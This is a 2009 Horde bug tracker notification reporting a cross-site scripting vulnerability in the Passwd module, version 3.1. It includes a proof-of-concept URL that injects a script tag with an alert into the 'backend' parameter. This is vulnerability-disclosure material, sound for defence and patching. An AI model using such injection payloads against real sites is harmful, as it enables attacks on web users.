[Tickets #8398] Cross Site Scripting Vulnerability
bugs at horde.org
bugs at horde.org
Fri Jul 3 18:45:14 UTC 2009
DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL: http://bugs.horde.org/ticket/8398
------------------------------------------------------------------------------
Ticket | 8398
Created By | security at davidwharton.us
Summary | Cross Site Scripting Vulnerability
Queue | Passwd
Version | 3.1
Type | Bug
State | Unconfirmed
Priority | 2. Medium
Milestone |
Patch |
Owners |
------------------------------------------------------------------------------
security at davidwharton.us (2009-07-03 14:45) wrote:
A cross site scripting vulnerability exists. Proof of concept:
http://hordeserver.com/horde/passwd/main.php?backend="><script>alert('XSS')</script>&userid=stevejobs&return_to=&oldpassword=foo&newpassword0=foo&newpassword1=foo&submit=Change%20Password
More information about the bugs
mailing list